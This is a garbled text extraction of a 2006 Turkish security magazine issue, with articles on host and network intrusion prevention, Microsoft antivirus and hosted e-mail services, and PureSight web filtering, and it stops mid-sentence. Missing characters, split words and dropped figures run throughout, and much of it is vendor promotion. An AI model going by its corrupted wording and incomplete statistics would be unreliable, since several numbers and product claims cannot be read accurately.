(HIPS) 2 BEYAZfiAPKA. Host Intrusion Prevention System. BSAPKA SAYI2 4/21/06 7:08 PM Page 2. Bir HIPS ürününün mimarisi

Ebat: px
Şu sayfadan göstermeyi başlat:

Download "(HIPS) 2 BEYAZfiAPKA. Host Intrusion Prevention System. BSAPKA SAYI2 4/21/06 7:08 PM Page 2. Bir HIPS ürününün mimarisi"

Transkript

1 BSAPKA SAYI2 4/21/06 7:08 PM Page 2 Host Intrusion Prevention System (HIPS) H Bir HIPS ürününün mimarisi 2 BEYAZfiAPKA ost Intrusion Prevention System (HIPS), sunuculara ve istemcilere gelen tüm ataklar engellemek üzere tasarlanm flt r. HIPS bir güvenlik yaz l m d r ve kaynaklar korur. HIPS ürünü ata n nerden geldi i ile ilgilenmez. Internet ten, lokal a dan ya da sunucu üzerinden... Önemli olan atak ve hedefidir. Eskiden Host Intrusion Detection ürünlerinde sadece bir atak bilgi bankas bulunuyordu. Yeni türemifl ataklar engellemek için bu ürünlerin güncellemeye ihtiyac bulunurdu. HIPS ürünleri ise güncellemeye ihtiyaç duymaks z n ataklar anlayabilir ve engelleyebilir flekilde tasarland. S - f r gün korumas (Zero-Day Protection) HIPS ürünleri ile do mufl bir güvenlik stratejisidir ve güncellemeye ihtiyaç duymadan, güvenlik aç n n tespit edildi i anda sistemlerin koruma alt nda olmas n ön görür. HIPS ürünlerinin tamam nda baz ortak özellikler bulunmaktad r. Bunlardan en önemlisi Buffer Overrun Protection özelli idir. Bir önceki say m zda Coflkun Kamilo lu Buffer Overrun ataklar n n nas l yap ld n anlatm flt. Sql Slammer, Nimda, Blaster, Code Red gibi solucanlar da buffer overrun tekni ini kullan r ve bu ataklar HIPS taraf ndan korunan sunucu ve istemcilerde etkisiz kal r. HIPS ürünlerindeki di er önemli bir özellik kaynak korumas d r. Örne in asp veya html gibi web sayfalar n koruma alt na alarak izin verdi imiz kimseler haricinde de ifltirilmesini engelleyebilir, web defacement n önüne geçebiliriz. Ayr ca Windows Registry sini tam olarak koruma alt na alabiliriz. Kullan c kendi bilgisayar nda Administrator yetkisine sahip olmamas na karfl n solucanlar standart Windows k rabilir ve kendilerini Registry kay tlar na ekleyebilirler. HIPS ürünleri bu tarz istenmeyen yaz - l mlar güncelleme gereksinimi olmadan engellemek için tek yöntemdir. HIPS ürünlerinin baz lar nda, de iflik platformlar için de iflik versiyonlar sunulmaktad r. Örne in SQL 2000 bir sistemde SQL ataklar n engellemek, IIS bir sistemde hem IIS metabase ini hem de http protokolünü HIPS denetimi alt na almak mümkün. HIPS ürünleri önceleri sunucular için tasarland ve agent bafl na 1500$-2500$ fiyat aral nda sat fla sunuldu. Daha sonra, özellikle laptop kullan c lar n n artmas ile HIPS ürünlerinin istemci versiyonlar üretildi ve 300$ fiyatla sat lmaya bafllanm flt. Bugün ise sunucu versiyonlar nda liste fiyatlar 800$ a kadar gerilemifl durumda. stemci versiyonlar ise 20$-30$ fiyat aral ndan sat l yor. Hatta McAfee Desktop Firewall ürününü sonland r p yerine tüm müflterilerini Desktop Firewall un tüm özelliklerini de bar nd ran McAfee Host Intrusion Prevention ürününe geçirmeye bafllad. Ayn flekilde McAfee HIPS, standart antivirus paketlerinin baz lar nda ücretsiz olarak veriliyor ve tüm güvenlik yaz l mlar n n tek noktadan yönetimi sa lan yor. Peki bir HIPS ürünü seçerken nelere dikkat edece iz? Öncelikle HIPS ürününü mevcut güvenlik yaz l mlar ile ayn platformda yönetmeliyiz. Çünkü her bir yönetim yükü ürünün ifllevselli ini azalt r ve yürütme maliyetini artt - r r. Tek bir yönetim konsolu ile bilgisayardaki HIPS ve Antivirus yaz l m n yönetmeyi mümkün k lan ürünler mevcut. Önemsememiz gereken ikinci nokta imza bilgi bankas. Bilgi bankas olmayan HIPS ürünlerinin üretti i raporlarda atak türleri hakk nda detay bulunmuyor. Koruma alt nda olmam za ra men sistemimize gelen ataklar istatistiksel olarak takip etmeli ve gerekli önlemleri almal y z. HIPS ürünlerinin baz lar nda a seviyesi korumas oldukça zay ft r. Özellikle web ve sunucular m z için a seviyesi güçlü HIPS ürünleri kullanmal y z. Alaca m z ürünün direk olarak NIPS ürünü ile entegre olmas ya da bir Security Management ortak platformunda birlikte raporlamay sa lamas toplam güvenlik yönetimi için vazgeçilmez bir unsurdur. Raporlama ve yönetim entegrasyonunu mutlaka göz önünde bulundurmam z gerekiyor. HIPS ürünlerinden sadece eski ad ile Entercept, yeni ad ile McAfee Host Intrusion Prevention NSS testlerine gönüllü olarak girmek için baflvurdu ve teste tabi tutuldu. Dolay s ile tüm HIPS ürünlerinde ba ms z yap lm fl, karfl laflt rmal net bir test raporu bulunmuyor. Bu durumda performans analizi için güvenlik dan flmanlar ile görüflmek tek etkin yol gibi görünüyor. HIPS ürünleri art k sadece atak aram yor. Baz ürünlerde tüm bilgisayarlardaki USB ayg tlar n yönetebilen özellikler de mevcut. Asl nda HIPS ürünlerinde USB ayg tlar n engellemek sistem yöneticilerinin yaratabilece i özel imzalar ile mümkündü. Yeni versiyonlarda daha kolay kullan m için bu özellik haz r bir imza haline getirildi. Gün geçtikçe sistem yönetimi ile ilgili bu imzalar n say s artmaya devam edecek. Gerek NIPS gerekse HIPS ürünlerinde görüldü ü üzere çok fazla dikkat edilmesi gereken nokta var. Ürünlerin getirdi i çok önemli özellikleri iyi incelemek ve a ihtiyaçlar ile örtüfltürmek projelendirme sürecinin en önemli ad m. Bu esnada tüm ürünlerin özelliklerini iyi derecede bilmek kadar siber tehditleri de yak ndan tan mak gerekir. NSS raporlar n inceledi inizde hiçbir ürünün detayl ca konfigürasyonu yap lmadan ataklar %100 engelleyemedi ini görebilirsiniz. Bu sebeple NIPS ve HIPS projelerine bir ürün sat n almak gibi bakmamak, bir güvenlik hizmeti al - yor gibi düflünmek Bilgi Güvenli i aç s ndan zorunludur Ayr ca NIPS ve HIPS ürünleri kullan l yor olmas o sistemin hack edilemeyece i anlam na gelmez. Hem yat r m yap lm fl ürünlerin performans n test etmek hem de anl k risk analizi yapabilmek için beyaz flapkal bilgi uzmanlar ndan penetration test ve denetim hizmetleri al nmas ak ll ca olacakt r. NIPS ve HIPS konular nda yorumlar n z benimle paylaflman z umuyorum. Bir sonraki say m zda herkesin merakla inceledi i NAC teknolojileri hakk nda bilgiler vermeye çal flaca m.

2 BSAPKA SAYI2 4/21/06 7:08 PM Page 3 Network Intrusion Prevention System (NIPS) Serkan AKCAN N Tipik bir IPS algoritmas etwork Intrusion Prevention System (NIPS), sisteme gelen bilinen ve bilinmeyen ataklar gerçek zamanl olarak durduran teknolojinin ad. Her güvenlik ürününde oldu u gibi NIPS ürünlerinde de bilinmeyen birçok nokta var. Bu yaz y bir NIPS ürünü tercih edilirken nelere dikkat edilmesi gerekti i ve ürünlerin ne gibi özelliklere sahip oldu unu anlatmak üzere haz rlad m. NIPS tercihinizi yaparken bu yaz n n önemli bir kaynak olaca n umuyorum Do ru tercih yapmak için en önemli kaynak NIPS ürünlerinin birço unu tan yan, güçlü ve zay f yönlerini iyi bilen güvenlik dan flmanlar ve güvenlik firmalar d r. Mutlaka uzmanlar n fikrini alman z öneririm. kinci büyük kayna m z NSS (www.nss.co.uk). NSS güvenlik ürünlerini ayn ortamlarda test eden ve test raporlar n satan ba ms z bir kurum. Test süreci ve sonuçlar bildi imiz di er dergileri testleri gibi de il. Son derece ciddi ve ba ms z testler. Bu testler 80$ ila 900$ aras nda de iflen fiyatlarla sat l yor $ de erinde bir NIPS almadan önce ba ms z test sonuçlar n görerek karar vermek ak lc olacakt r. NSS raporlar nda da görebilece iniz gibi ürün donan m performans aç s ndan oldukça önemli. Birçok ürün PC Server donan m üzerine çal fl yor. Baz lar ASIC, FPGA, RISC gibi özel donan mlara sahipler. Benim elimde 2003 ten bu yana yap lan tüm NSS test raporlar mevcut. Bu raporlar inceledi imizde geçti imiz senelerde PC tabanl sistemlerin atak tespit etme ve engelleme performanslar n n pekte yüksek olmad n görüyoruz testlerinde performanslar artm fl durumda ancak PC mimarisi sebebiyle latency dedi imiz kavram öne ç k yor. Latency paketin denetimi s ras nda kaybedilen zamand r. PC donan m na sahip NIPS ürünlerinde latency süresi biraz fazlaca. ASIC mimarili ürünlerde performans normal olarak çok daha yüksek. Tipik bir IPS algoritmas ASIC ve PC donan m n karfl laflt rd m zda karfl m za ç - kan önemli bir faktör de Fail-Safe özelli i. Fail-Safe, ürünün donan m nda ya da yaz l m nda bir sorun oldu unda, özel bir TAP cihaz ile a iletifliminin devam n sa layan bir özellik. PC mimarili ürünlerin hemen hemen tamam nda bu özellik d flardan tak lan bir TAP cihaz ile yap l rken ASIC ürünlerde kutunun içinde bu özellik bulunuyor. PC donan m üzerinde NIPS ürünü gelifltiren firmalar n ASIC ya da Power PC mimarileri üzerine gelifltirme çal flmalar yapt klar n da önemle hat rlatal m. Üzerinde durulmas gereken di er bir nokta ise DDoS korumas. SYN-Proxy ya da SYN-Cookie teknolojisi s kça yap lan SYN ataklar n engellemek için en efektif yöntem. lgilendi iniz ürünün DDoS engelleme politikas n dikkatlice incelemek gerekiyor çünkü SYN-Proxy her NIPS ürününde yok Son zamanlarda en çok duydu um sorulardan biri de Allin-One ürünlerin ne kadar yeterli oldu u. Bu ürünler firewall, NIPS, VPN ve Antivirus gibi özellikleri bar nd r yorlar. Bu ürünlerde dikkatlice NIPS kabiliyetlerini karfl laflt rmak gerekiyor. Birçok All-in-One ürün üzerinde sadece 10 kadar protokol için atak denetimi ve protocol-anomaly özelli i çal flt r labiliyor. fli sadece NIPS olan profesyonel ürünlerde protocol-anomaly teknolojisi 100 den fazla protokol için uygulan yor. Aradaki fark oldukça büyük... Belki de iflin en önemli k sm kullanaca n z NIPS ürününün a n za uyumu. Örne in vlan kullan yorsan z, destek veren ürünler var. Baz ürünlerde ise hem destek var hem de vlan bilgilerini kullanarak Virtual NIPS yaratabiliyorsunuz. Yani tek bir segment üzerine 100 tane sanal NIPS cihaz çal flt rabiliyorsunuz. E er https üzerinden hizmet veren bir web sunucunuz varsa, flifrelenmifl trafi i aç p içine bakabilen NIPS ürünleri var. NAC sisteminiz önemliyse, NAC ile entegre çal flan, atak yapan iç yada d fl pc leri otomatik olarak karantina a na yönlendiren NIPS ürünleri mevcut. VOiP konusuna da dikkat etmek gerekiyor. Baz ürünlerde VOiP ataklar na karfl koruma mekanizmas mevcut. IP Telephony kavram n n h zla geliflti i ülkemizde bu özelli i görmezden gelemeyiz. Güvenlik aç s ndan göz ard edilmemesi gereken önemli bir nokta da Web Client Protection. Atak tiplerinin de iflmesi ile birlikte web sunucular üzerinden yap lan atak say s artt. Spyware, trojan ve malware ataklar art k web sitelerine gömülüyor ve kullan c lar fark nda olmadan internet taray c lar üzerinden ataklara maruz kal yorlar. NIPS ürünlerinin bir k sm art k istemci bilgisayarlar n http eriflimlerini de denetleyebiliyor. Her zaman söyledi imiz gibi iyi bir hizmet ya da üretici deste i alam yorsan z, ürün kalitesi ve performans ikinci planda kalabilir. NIPS hizmetlerini alaca n z güvenlik firmas n n personelinin tecrübesi ve sertifikasyonuna dikkat etmek gerekiyor. Ayr ca spesifik sorunlara h zl çözüm bulmak için üreticinin Türkiye de ofisinin bulunmas da oldukça önemli. IDC verilerine göre Türkiye güvenlik pazar n 2-3 sene geriden takip ediyor. Bu da demek oluyor ki önümüzdeki senelerde Security Management ürünleri ile tan flaca z. Tüm ürünlerimizde oldu u gibi NIPS ürünümüzde de Security Management sistemleri ile entegre çal flabilen bir yap oluflturmam z gerekecektir. Security Management konusunda daha fazla bilgi için ArcSight n web sitesini ziyaret edebilirsiniz, Henüz Türkiye de gerçek de erini bulamam fl Host Intrusion Prevention (HIPS) ürünleri ile NIPS entegrasyonu da atak engelleme stratejimiz için önemli bir nokta. Atak engelleme çözümlerini birlikte çal flt rmak, birlikte yönetmek ve birlikte raporlamak her sistem için bir zorunluluk haline geldi. Son olarak Vulnerability Assessment ve Risk Management ürünü entegrasyonundan bahsedebiliriz. Baz NIPS ürünlerindeki bu özellik sayesinde Vulnerability Assessment ürünlerinin bilgi bankas nda bulunan güvenlik aç klar ile NIPS üzerindeki imzalar karfl laflt rabiliyoruz. Böylece toplam riskin ne kadar n NIPS ürünü ile bertaraf edebildi imizi kolayca görebiliyoruz. Toplam güvenlik yönetiminde riskin fark na varmam z kolaylaflt ran bir çözüm. Bu s rada önemle belirtmek istedi im bir konu var. NIPS ürünlerinin performans, yo un atak alt nda gösterdi i performans ile ölçülür. Baz ürünler yo un trafik ve yo un atak alt nda normal flartlarda yakalayabildi i ataklar ka- ç rm vafll tayl BEYAZfiAPKA 3

3 BSAPKA SAYI2 4/21/06 7:08 PM Page 4 Microsoft Antivirüs 4 BEYAZfiAPKA fl dünyas nda , doküman paylafl m ve h zl ileti gün geçtikçe çok daha kritik altyap bileflenleri haline geliyor. Kötü niyeti yaz l m ve spam oluflturan kifliler, kurumsal a lara girebilmek için birinci yöntem olarak e-posta sunucular n kullan yor. MSN Hotmail tek bafl na günde yaklafl k 3 milyar spam iletisini ifllemden geçirmekte. H zl ileti ve birlikte çal flma web sitelerinin kullan m h zla art için bu altyap lar da kötü niyetli yaz l mlar oluflturanlar n hedefleri haline geldi. Microsoft kötü niyetli yaz l m ve spam tehditlerinden müflterilerinin korunmas na yard mc olmak için önemli ad mlar att. Bunlardan en önemlisi Sybari Software firmas n n sat n al nmas ile birlikte Antigen ve Advanced Spam Manager antivirüs ve antispam yaz l mlar n n Microsoft ürün ailesine kat lmas yd. Antigen kendi içinde farkl virüs tarama motorlar n birlefltirerek kurumlar n tek bir çözüm içinde birden çok tarama motorunu kullanmas n sa l yor. Birden çok tarama motorunu tek bir üründe toplamak güvenilirli i ve virüs alg lama oran n art r yor y l nda kurumlar n % 78 i virüs sorunu yaflam fl ve bu kurumlardan % 98 inde antivirüs program kullan ld halde yaflanm fl bu sorun (2005 CSI/FBI Güvenlik Araflt rmas ). Bu araflt rmadan da anlafl ld gibi günümüzde tek tarama motorlu ürünler virüs tehditlerinden korunmaya yeterli olmuyor. Kurumlarda bu nedenle birden fazla antivirüs ürünü kullan l yor, bu da yönetim maliyetlerini art r yor. Oysa Antigen çok katmanl virüs korumas n, merkezi tek bir yönetim çözümü ile birlikte sa layarak yönetim maliyetinizin artmas n önlüyor. Antigen standart olarak Microsoft AV engine, Sophos, CA etrust Iris, CA etrust Vet ve Norman tarama motorlar yla birlikte geliyor, ek ücret ile Kaspersky, VirusBuster, Authentium ve AhnLab tarama motorlar n da çözüme ekleyebiliyorsunuz. Bu teknolojileri merkezi olarak yönetilebilen entegre bir ürün olarak sunmak antivirüs endüstrisinde çok büyük bir ad m. Tek motorlu modellerde, tek olan tarama motoru kilitlenirse tüm IT sistemleri tehdit alt nda kal r, bu sorun çok büyük para ve verimlilik kay plar na yol açabilir. Birden çok motorlu modeller bu riski ortadan kald r r. Antigen yeni güncelleme dosyalar n yay nlamadan önce test eder. kinci bir koruma olarak, Antigen yönetim program bozuk bir güncelleme dosyas n internetten indirirse, hemen o tarama motoru çevrimd fl hale gelir ve di er tarama motorlar IT sistemlerini korumaya devam eder. Ayn zamanda bir tarama motoru güncellefltirilirken di erleri çal flmaya devam eder ve böylece sistem devaml l sa lanm fl olur. Birden fazla tarama motoru kullan larak güvenilirlik art r l rken sunucu performans n n düflürülmemesi için Antigen yönetim program performans optimizasyonu sa lar. Performans ve güvenilirlik aras nda hedeflenen dengenin bulunmas için özel algoritmalar kullan r. Ayn zamanda bellek üzerinde tarama yaparak, kullan labilir uygulama belle ini dinamik olarak ileti tarama için kullan r ve böylece sunucu verimlili i etkilenmeden gerçek zamanl koruma sa lanm fl olur. Antigen antivirüs ürünleri Antigen for Microsoft Exchange, Exchange Server 5.5, 2000 ve 2003 üzerinde virüs koruma ve geliflmifl içerik filtreleme çözümü sunar. Antigen for SMTP Gateways, Windows Server 2003 ve Windows 2000 Server SMTP gateway üzerinde virüs korumas sa layarak virüsleri a geçidinde durdurur ve virüslerin kurum içindeki e-posta sunucular na ulaflmas n önler. Antigen for SharePoint, Windows SharePoint Services ve SharePoint Portal Server 2003 üzerinde SharePoint doküman kütüphanelerini virüslerden ve istenmeyen içerikten korur. Antigen for Instant Messaging Microsoft Live Communications Server 2005 üzerinde h zl ileti yaz flmalar nda ve dosya transferlerinde gerçek zamanl virüs korumas ve içerik taramas yapar. Anti-spam Spam birçok kurum için h zla büyüyen bir güvenlik sorunu. Araflt rmalara göre e-posta iletilerinin yaklafl k % 75 ilâ % 85 i spam. Spam verimlilik kayb n n yan nda antiphishing sald r lar ile birlikte kurumlar için daha tehlikeli bir duruma geldi. Advanced Spam Manager, Windows SMTP Gateway ve Exchange serverlar üzerinde spam korumas için bir antispam motoru ve içerik filtreleme katman bulundurmaktad r. Devaml güncellefltirilen antispam motoru, spam hilelerini tan mlar ve kald r r. Ayn zamanda Micronsoft Exchange Server 2003 Intelligent Message Filter (IMF) ile entegre çal fl p ek bir güvenlik katman getirir. Antispam teknolojileri genelde % 95 yakalama oran ile çal fl r, bu da 10 bin spam iletisinde 500 spam iletisinin alg lanamamas demektir. Advanced Spam Manager ile IMF birlikte çal flt nda, gelen iletiler hem Advanced Spam Manager ile hem de IMF ile taran p alg lanamayan bu 500 adet spam iletisinin say s 75 adede kadar indirilebilir. Bu sonuç da % oranda spam alg lamas demektir ki bu oran, tek bafl na hiçbir antispam ürünü ile sa lanamaz. Advanced Spam Manager ile sistem yöneticileri spam iletilerini kullan c lar n önemsiz (junk) posta klasörlerine yönlendirebilir, kurumsal karantinaya alabilir, silebilir veya etiketleyerek kullan c ya gönderebilirler. stenmeyen içerik sadece spam iletilerinden oluflmaz, ayn zamanda kurumsal iç ve d fl e-postalar uygunsuz içerik bar nd rabilirler, örne in yasal ve etik olarak sorgulanabilir içerikler. Advanced Spam Manager bu tür içerikli iletileri engelleyebilen, yap land r labilir içerik ve dosya filtreleme kurallar n da sa lar. Advanced Spam Manager belirli IP adreslerinden, etki alanlar ndan ve göndericilerden gelen tüm iletiflimi bloklayabilir. Microsoft, Advanced Spam Manager, Antigen for Exchange, Antigen for SMTP Gateways, Antigen for SharePoint ve Antigen for Instant Messaging ürünleri ile kurumsal müflterilerine e-posta ve birlikte çal flma altyap lar nda virüsler, wormlar, spam ve uygunsuz içeri e karfl tam bir koruma sa lamay hedeflemektedir. Microsoft E-posta Filtreleme, Arflivleme, fiifreleme Servisleri

4 BSAPKA SAYI2 4/21/06 7:08 PM Page 5 ve Antispam Çözümleri Göksel TOPBAfi ni Virüsler, wormlar, spam tehtidleri, regülasyonlar ve yasal zorunluluklar, e-posta yönetimini gün geçtikçe daha zor bir hale getiriyor. Kendi içlerinde e-posta güvenlik çözümleri yönetmek yerine d fl kaynak kullan m düflünen kurumlar için Microsoft Exchange Hosted Services hizmeti verilmeye baflland. Microsoft Exchange Hosted Services dört ayr servisten olufluyor. Microsoft Exchange Hosted Filtering servisi ile kurumlar n virüs, worm ve spam tehtidlerinden korunmas na; Microsoft Exchange Hosted Archive servisi ile kurumlar n e-posta arflivleme standartlar na uyum sa lamalar na; Microsoft Exchange Hosted Encryption servisi ile kurumlar n veri gizlili ini korumak için veri flifrelemelerine ve Microsoft Exchange Hosted Continuity servisi ile kurumlar n acil durumlarda e-posta erifliminin devam n sa lamalar na yard mc olunuyor. Servisler Internet üzerinden veriliyor ve en önemlisi ön kapital yat r m gerektirmiyor. Bu servisler BT çal flanlar n n e-posta bak m na harcad klar zaman kuruma de er sa layacak di er ifllere yöneltmelerini sa larken ayn zamanda iletilerle gelecek risklerin kurum güvenlik duvar na ulaflmadan ortadan kald r lmas n sa l yor. Sadece MX kayd n n de ifltirilmesi ile Microsoft Exchange Hosted Services çal fl r hale geliyor. Yeni bir donan m ya da yaz l m sat n al nmas kurulmas ve yap land r lmas gerekmiyor. Bununla birlikte hali haz rdaki e-posta altyap n z da de ifltirmenize gerek kalm yor. Microsoft Exchange Hosted Services nternet omurgas üzerinde da n k yap daki veri merkezleri üzerinden sa lan yor. Her veri merkezi hataya dayan kl sunucular bulunduruyor, ayn zamanda veri merkezlerinin bulundu u siteler ve sunular aras nda yük da l m yap l yor. Veri merkezlerinden birisi ar zalansa, trafik otomatik olarak di er veri merkezine yönlendiriliyor, böylece servis kesintisi önleniyor. Microsoft % oranla servisin çal fl r durumda kalaca n garanti ediyor. Microsoft Exchange Hosted Filtering servisinde ayn anda en az üç ayr antivirüs motoru kullan l r ve akut tehditler karfl s nda ek tarama motorlar devreye sokulup ek koruma getirilir. Antispam uygulamas nda yakalanan spam iletiler, karantina klasöründe tutulup web arayüzü üzerinden son kullan c lar ve sistem yöneticileri taraf ndan ulafl labilir hale getirilir. Müflterinin e-posta servisi veya Internet ba lant s herhangi bir nedenden dolay ar zalan rsa, Exchange Hosted Filtering servisi hiçbir mailin kaybolmamas n sa lar, Microsoft iletileri art r lm fl bir ortamda befl güne kadar bar nd r r. Müflterinin e-posta sunucusu yeniden çal fl r duruma geldi inde, tüm bekletilen iletiler otomatik olarak ak fl kontrollü bir flekilde gönderilir. Böylece kesintisiz ve güvenlik tehditlerine karfl filtrelenmifl bir e-posta servisi sa lanm fl olur. Microsoft müflterilerinin güvenlik risklerini azaltmak için önemli yat r mlar yapmaya devam ederek, h zla büyüyen ve karmafl klaflan virüs, worm, phishing, spam gibi tehtidlere karfl çok daha güvenli ortamlar sa lamay hedefliyor. Ürün taraf nda Antigen ve Advanced Spam Manager, servis taraf nda Microsoft Exchange Hosted Services bu yat r mlar n önemli birer örne i. BEYAZfiAPKA 5

5 BSAPKA SAYI2 4/21/06 7:08 PM Page 6 çerik Denetimi I 6 BEYAZfiAPKA nternet kullan m n n yaflant m z n vazgeçilmezi haline gelmesi ile birlikte, internet üzerinde çal flanlar n faaliyetlerinin ve internet eriflimi için yap lan yat r mlar n ne kadar verimli kullan ld konusu günümüzün en önemli sorunlar ndan birini oluflturmaktad r. IDC taraf ndan yap lan bir araflt rmaya göre, çal flanlar n ifl saatlerindeki internet kullan mlar n n % 30 ilâ % 40 oran ndaki k sm n n ifl d fl ndaki konularla ilgili oldu u saptanm flt r. Yine Juniper taraf ndan yap lan bir araflt rmada ise ifl ile ilgili olmayan sitelere ziyaretlerin yaklafl k % 45 oran ndaki k sm n n ifl saatlerinde yap ld ortaya konulmufltur. Baflka bir firman n yapt bir baflka araflt rmada ise özellikle pornografik içerikli sitelere yap lan ziyaretlerin % 70 e yak n k sm n n yine ifl saatlerinde yap ld saptanm flt r. Bu nedenle, akl m za bir soru ister istemez tak lmaktad r. flletmemizde oluflturulan a ne amaçlarla kullan lmakta ve yapt m z yat r mlar ne kadar verimli kullan lmaktad r? Bu ve benzeri sorulara cevap bulmak, yapt n z yat r m korumak ve çal flanlar n performanslar n art rmak, sisteminize uygun içerik denetimi ve raporlamas n yapan ürünleri kullanmay gerektirmektedir. Bu konudaki ürünler genel olarak tüm internet ortam ndaki siteleri kategorilere ay ran veritaban na sahip olanlar ve bir veritaban na sahip olmadan anahtar sözcükleri bir içerik denetim mekanizmas ile sayfalar içinde tarayanlar olarak ikiye ayr lmaktad r. Veritaban na sahip olarak çal flan ürünler dünya üzerindeki web sayfalar n kategorilerine göre s n fland rmakta ve kendi gelifltirdikleri arama yöntemleri ile yeni web sayfalar n bularak bunlar n kategorilerini belirlemekte ve kendi veritabanlar na eklemektedir. Bu sistemde internette bir web sayfas na ba lant için bir istek geldi inde, web sayfas veritaban nda taranmakta ve ilgili kategoriye göre izin verilen web sayfalar na eriflim yap lmas na izin verilmektedir. Veritaban sistemlerde mevcut sitenin çok küçük bir k sm n n (genelde site bafl na % 1 i geçmemektedir) veritaban nda bulunmas bu sistemi kusursuz olmaktan uzaklaflt rmaktad r. Veritaban na sahip olmadan anahtar sözcük arama yöntemi ile çal flan sistemlerde ise belirlenen anahtar sözcüklere bir puanlama uygulan r ve bir web sayfas için toplam puan belirlenir. Böylece yaz lan kurallarla eriflim yap lmaya çal fl lan web sayfas n n toplam puana eriflmesi ya da geçmesi durumlar na göre eriflime izin verilir ya da verilmez. Ancak anahtar sözcük tan yan sistemler söz dizimlerini tan makla yetersiz kalmaktad rlar. Bunun d fl nda bu yöntemde yaz m hatalar da farkl sorunlara yol açabilmektedir. PureSight Intelligent Content Recognition PureSight ürün ailesi, Active Content Recognition (ACR) olarak bilinen geliflmifl ve patentli bir teknolojinin üzerinde gelifltirilmifltir. ACR, Internet içeri inin özelli ini güçlü algoritmalar kullanarak gerçek zamanl tan makta ve önceden tan mlanm fl kurallara göre eriflim denetimini tad r. PureSight çok katmanl filtreme (Multilayer Filtering) yaklafl m sunan bir yeniliktir. PureSight filtreleme yöntemlerini ACR içindeki çekirdek teknolojisi ile birlefltirerek çok katmanl bir internet içerik denetleme olana sunmaktad r. Bu denetlemeyi manuel ve otomatik güncellenen içerikler içeren birkaç filtreleme yöntemini kullanarak yapmaktad r. Bu yöntemler afla daki gibi özetlenebilir. ACR Bütün istek yap lan sayfalar n içeri ini denetleyen bir dinamik içerik filtreleme teknolojisidir. Tagging çerik kategorilerini günümüzde kullan lan içerik oylama sistemlerini kullanma yoluyla belirler. Database Puresight taraf ndan uzaktan yönetilen kara listedeki web sayfalar n n s n fland r lmas d r. Network Static List Yöneticiler taraf ndan kullan c lar n internet sayfalar na ulafl m politikalar n düzenleyen, örne in, Black List ve White List gibi tan mlamalar n yap ld listedir. Cache Categorization A performans n art rmak için önceden belirlenmifl yerel önbellek. Active Content Recognition Aktif içerik tan ma sisteminde, herhangi bir web sayfas iste i al nd nda web sayfas ile ilgili paket ayr flt r c ya (Parser) gönderilir. Ayr flt r c ACR nin bilgiyi araflt ran ilk parças d r. Ayr flt r c, paketin içindeki yüzlerce parametreyi inceleyerek Raw Data Vector ü (RDV) oluflturur. ACR motoru birçok parametreyi sayfan n format na ve sözcük bilgisine göre inceler. Ayr flt r c taraf ndan oluflturulan Raw Data Vector yapay zeka algoritmas n n birinci katman olan Feature Extractor taraf ndan incelenerek içeri inde belirli özellik içeren baflka bir vektör oluflturulur. Buna Process Data Vector (PDV) denilmektedir. PDV, Clustering Mechanism ad verilen yapay zeka algoritmas n n ikinci katman taraf ndan incelenir. Clustering Mechanism, PDV içeri indeki bileflimleri ve iliflkileri inceleyen bir sinir a d r. Bu katman PDV i inceleyerek kategorileri belirler. Daha sonra ACR nin filtresinden geçirilerek belirlenen kurallar çerçevesinde kullan c ya eriflim izni verilir. Kamu kurumlar ve flirketler iletiflim standartlar n korumak, çal flanlar n n üretkenliklerini ve yasal güvenilirliklerini denetlemek isterler. ISS lar abonelerin internet eriflimlerini yönetmek için etkin araçlara gereksinim duyarlar. Aileler çocuklar n n internete ba land klar nda nerelere ulaflt klar konusunda endifle duyarlar ve bilgi sahibi olmak isterler. PureSight, uygulamay düflündü ünüz web filtreleme gereksinimleriniz için uygun bir çözümdür. Mevcut altyap n - za kolayca entegre edilebilir. PureSight, patentli Intelligent Content Recognition (ICR) teknolojisi sayesinde veritaban gerektirmeden tüm internet içerikleri üzerinde içerik denetimini h zl ve büyük bir baflar ile yapabilmektedir. ste e ba l listeler, özel filtre-

6 BSAPKA SAYI2 4/21/06 7:08 PM Page 7 Sinan YILMAZ ni leme kategorileri, çoklu dil deste i (Multi-Language) ve Black List - White List deste i sayesinde daha h zl ve kapsaml içerik denetleme seçenekleri sunmaktad r. Ayr - ca filtreleme kategorileri d fl nda kalan web sayfalar na da büyük bir baflar ile içerik denetimi tad r. Örne in Google üzerinde arat lan bir anahtar sözcük sonucunda ekrana gelen linklerin alt nda bulunan önbellek linkine eriflim iste inde bulundu unuzda normalde di er içerik denetleme çözümleri devre d fl kalmakta ve istenilen içerik herhangi bir kural iflletilemeden ekrana gelmektedir. PureSight ise bu ve benzeri durumlarda sahip bulundu u teknoloji sayesinde belirledi iniz kategoriler için oluflturulan kurallar bu tür istekler için de baflar l bir flekilde iflletmektedir. PureSight, geliflmifl yönetim araçlar yla tam ve esnek internet içerik filtreleme çözümleri sunmaktad r. Distributed Collaborative (DisCo) mimarisi sayesinde gerekli olan durumlarda tek bir noktadan birden fazla bölgede çal flan Content Filtering Server lar n yönetimine olanak tad r. Ayn flekilde merkez ofiste kurulan Log Server sayesinde di er bölgelerde bulunan Content Filtering Server lar n loglar n n da tek bir noktada toplanarak raporlanmas sa lanabilmektedir. PureSight, benzer ürünlerin uygulad kiralama yönteminden (her y l ayn bedeli ödeyerek) farkl olarak kullan - c bafl na bir lisanslama maliyetine sahiptir. Y ll k yenileme maliyeti ise sahip olma maliyetinin yaklafl k % 20 sidir. Lisanl kullan c say s afl ld nda lisans say s d fl nda kalan kullan c lar herhangi bir kurala tabi olmadan internet eriflimi yapmaktad r. PureSight Manager, Microsoft Windows 2000 Server ya da Linux iflletim sisteminde çal flabilmektedir. Ayn flekilde Content Filtering Server ISA Server ya da Squid Proxy Server ile entegre edilebilmektedir. ISA Server ile entegre edildi inde Active Directory ile de tam entegrasyonu sa lanmakta ve kullan c baz nda da kurallar oluflturulabilmektedir. Log Server ise yine Microsoft Windows 2000 Server ya da Linux Server üzerinde kendi veritaban sistemi ile loglar de erlendirmektedir. stenirse My SQL Server kurularak loglar n My SQL server üzerinde tutulmas da mümkündür. PureSight ürününün sat fl ve destek hizmetleri Türkiye Da- t c s Elmer Yaz l m taraf ndan verilmektedir. Müflteri Deneyimi (TÜB TAK MAM) nternet eriflim filtreleme ihtiyac m z için araflt rma yapt m z s rada tan flt m z PureSight, bilgi bankas olmadan çal fl yor olmas sebebiyle ilgimizi çekti. Yapt m z testlerde bilgi bankas zorunlulu u olan di er ürünlerden daha yüksek bir performans ile çal flt n gördük ve ürünü sat n ald k. Pure- Sight tercih etmemizde performans n n yan s ra, yönetiminin ve bak m n n kolayl ile Linux ve Windows 